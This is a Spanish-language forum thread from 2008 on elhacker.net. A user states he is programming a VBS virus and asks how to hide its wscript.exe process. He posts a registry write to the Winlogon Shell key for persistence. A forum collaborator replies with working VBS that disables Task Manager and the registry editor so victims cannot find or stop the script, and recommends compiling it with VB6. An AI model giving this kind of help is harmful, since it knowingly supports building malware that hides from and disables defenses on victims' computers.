elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Ocultar el proceso Wscript.exe		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ocultar el proceso Wscript.exe  (Leído 7,259 veces)
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Ocultar el proceso Wscript.exe
« en: 24 Septiembre 2008, 21:03 pm »
Buenas..
Estoy programando un virus en VBS y siempre que lo ejecuto el proceso Wscript se ve en los procesos del admin de tareas. Como hago para que no lo muestre o como hago para Inyectarlo en el Explorer.exe?

Les muestro::

Set Inyec = CreateObject("WScript.Shell")
Inyec.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon","Shell = "Explorer.exe "[Nom_Carp]\Virus.vbs"""

Es la sintaxis correcta? o como hago para inyectarlo en el Explorer.exe?

O sera mas conveniente pasarlo a EXE?

Gracias de antemano..


SALUD.O.S
« Última modificación: 24 Septiembre 2008, 21:05 pm por Bakura182 » En línea
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Ocultar el proceso Wscript.exe
« Respuesta #1 en: 24 Septiembre 2008, 21:07 pm »
No es posible hacer eso, no se puede "inyectar" el proceso del wscript en el explorer, y para ser más gráfico, no se puede inyectar nada con el wsh, la única manera de hacer que no se vea este proceso, es impedir que se liste los procesos que están en ejecución, deshabilitando el taskmgr, y ms-dos   :rolleyes:

Siento que no sea la respuesta que buscabas, pero es la única que puedo darte  :-\

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Ocultar el proceso Wscript.exe
« Respuesta #2 en: 24 Septiembre 2008, 21:13 pm »
Gracias Novlucker..

Pero, Creo que si se pueden inyectar procesos al explorer.exe ...

Por eso preguntaba, si se puede pasar el VBS a EXE.

Entonces decis que deshabilite el admin de tareas y la consola verdad?

Set DeshabCmd = CreateObject("WScript.Shell")
DeshabCmd.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableCMD 0

Y el admin?



SALUD.O.S
En línea
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Ocultar el proceso Wscript.exe
« Respuesta #3 en: 24 Septiembre 2008, 21:23 pm »
Si, es posible inyectar procesos en el explorer.exe, pero a traves de la clave shell, solo inicias el proceso a traves del explorer.exe, igualmente el proceso será ejecutado por medio de wscript.exe o cscript.exe, después de todo son sus interpretes, por lo que como dije, no puede inyectarse ningún script vbs en nada, eso puedes hacerlo en otros lenguajes, y no de scripting

Lo de compilarlo, simplemente utiliza el vb6 y podrás compilarlo sin problemas.

Para el administrador de tareas y además el regedit --->

Código
  1. Set WshShell = WScript.CreateObject("WScript.Shell")
  2. WshShell.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
  3. WshShell.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"

Saludos  ;)
« Última modificación: 24 Septiembre 2008, 22:52 pm por Novlucker » En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Enemy

Desconectado Desconectado

Mensajes: 285


Que vuelva el personal de hace 15 años al foro!


Ver Perfil
Re: Ocultar el proceso Wscript.exe
« Respuesta #4 en: 24 Septiembre 2008, 22:03 pm »
EL VB6 , Puede compilar el vbs sin ningun drama?

Eso voy a intentar..

Gracias hermano.. eres de ayuda.

Mas adelante posteare el codigo completo de mi virus para que me ayuden a completarlo, lo empeze hace un mes.
Se que tengo errores por eso las ayudas..

Gracias nuevamente..


SALUD.O.S
En línea
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Ocultar el proceso Wscript.exe
« Respuesta #5 en: 24 Septiembre 2008, 22:53 pm »
Si, el vb6 no tendrá ningún problema, puede que alguna función en especifico no sirva, como puede ser wscript.scriptfullname, pero basta con buscar su equivalente  ;)

Saludos
En línea
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
¿Ocultar proceso?
Análisis y Diseño de Malware 		shaggikpo 6 15,846 Último mensaje 23 Enero 2011, 17:23 pm
por sabeeee
Ocultar proceso abierto con bat
Scripting 		arrebato21 2 3,177 Último mensaje 12 Octubre 2014, 23:53 pm
por Eleкtro
ocultar proceso [naab inside]
Análisis y Diseño de Malware 		itinerante 6 4,816 Último mensaje 29 Noviembre 2014, 22:02 pm
por k0pkill3r
Ocultar un proceso del taskmanager
Análisis y Diseño de Malware 		Borito30 0 4,186 Último mensaje 23 Noviembre 2016, 17:23 pm
por Borito30
Ocultar proceso en el sistema operativo o alternativas
Seguridad 		MeMeo 6 4,240 Último mensaje 13 Febrero 2020, 04:43 am
por MeMeo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines